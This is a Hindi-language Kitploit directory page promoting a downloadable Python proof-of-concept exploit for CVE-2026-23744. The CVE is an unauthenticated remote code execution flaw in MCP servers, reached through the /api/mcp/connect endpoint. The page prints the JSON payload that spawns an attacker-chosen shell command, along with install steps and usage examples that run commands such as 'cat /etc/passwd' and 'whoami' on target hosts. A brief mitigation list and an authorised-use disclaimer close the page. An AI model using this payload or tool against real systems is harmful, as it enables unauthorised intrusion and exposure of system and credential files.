Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-23744-POC — # CVE-2026-23744 के लिए Python PoC, MCP सर्वरों में /api/mcp/connect serverConfig कमांड फ़ील्ड के माध्यम से अनप्रमाणित RCE (डिफ़ॉल्ट पोर्ट 6274) | Kitploit
उपकरण/GitHubGitHub/d3vn0mi/cve-2026-23744-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubd3vn0mi/cve-2026-23744-poc

CVE-2026-23744-POC

# CVE-2026-23744 के लिए Python PoC, MCP सर्वरों में /api/mcp/connect serverConfig कमांड फ़ील्ड के माध्यम से अनप्रमाणित RCE (डिफ़ॉल्ट पोर्ट 6274)

रिपॉजिटरी देखें
5 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-23744 — MCP सर्वर अनप्रमाणित RCE

d3vn0mi द्वारा प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट

अवलोकन

CVE-2026-23744 पोर्ट 6274 पर उजागर MCP-संगत सर्वरों में एक अनप्रमाणित रिमोट कोड निष्पादन (RCE) भेद्यता है। /api/mcp/connect एंडपॉइंट एक serverConfig ऑब्जेक्ट स्वीकार करता है जो कॉल करने वालों को एक मनमाना OS कमांड और तर्क निर्दिष्ट करने की अनुमति देता है — बिना किसी प्रमाणीकरण या प्राधिकरण जांच के।

सेवा तक नेटवर्क पहुंच रखने वाला हमलावर MCP सर्वर चलाने वाले उपयोगकर्ता के रूप में मनमाने कमांड निष्पादित कर सकता है।

विवरणमान
CVE IDCVE-2026-23744
प्रकारअनप्रमाणित रिमोट कोड निष्पादन
एंडपॉइंटPOST /api/mcp/connect
पोर्ट6274 (डिफ़ॉल्ट)
गंभीरताक्रिटिकल

भेद्य पेलोड

root@kitploit:~
{
  "serverConfig": {
    "command": "sh",
    "args": ["-c", "<ATTACKER_COMMAND>"],
    "env": {}
  },
  "serverId": "anything"
}

सर्वर बिना सैनिटाइज़ेशन या एक्सेस नियंत्रण के दिए गए args के साथ आपूर्ति किए गए command को स्पॉन करता है।

इंस्टॉलेशन

root@kitploit:~
git clone https://github.com/d3vn0mi/CVE-2026-23744-POC.git
cd CVE-2026-23744-POC
pip install -r requirements.txt

उपयोग

root@kitploit:~
# बेसिक उपयोग
python3 exploit.py -t <TARGET_IP> -c '<COMMAND>'

# कस्टम पोर्ट
python3 exploit.py -t 192.168.1.10 -p 6274 -c 'id > /tmp/pwned.txt'

# पहुंच-क्षमता जांच छोड़ें
python3 exploit.py -t 10.0.0.5 -c 'whoami' --no-check

# कस्टम सर्वर ID
python3 exploit.py -t 127.0.0.1 -c 'cat /etc/passwd' -s my_server

विकल्प

फ़्लैगविवरण
-t, --targetलक्ष्य IP या होस्टनाम (आवश्यक)
-c, --commandनिष्पादित करने के लिए OS कमांड (आवश्यक)
-p, --portलक्ष्य पोर्ट (डिफ़ॉल्ट: 6274)
-s, --server-idपेलोड में serverId मान
--timeoutप्रोब टाइमआउट सेकंड में (डिफ़ॉल्ट: 30)
--no-checkप्रारंभिक पहुंच-क्षमता जांच छोड़ें

उपचार

  • MCP सर्वर को अविश्वसनीय नेटवर्क पर उजागर न करें।
  • उपलब्ध होते ही विक्रेता पैच लागू करें।
  • प्रमाणीकरण और नेटवर्क-स्तरीय नियंत्रणों के माध्यम से /api/mcp/connect एंडपॉइंट तक पहुंच प्रतिबंधित करें।
  • MCP सर्वर प्रक्रिया से अप्रत्याशित प्रोसेस स्पॉनिंग की निगरानी करें।

अस्वीकरण

यह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। लेखक दुरुपयोग के लिए कोई दायित्व नहीं मानता है। परीक्षण से पहले हमेशा उचित प्राधिकरण प्राप्त करें।

लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है।

लेखक

d3vn0mi — github.com/d3vn0mi

टूल डाउनलोड करें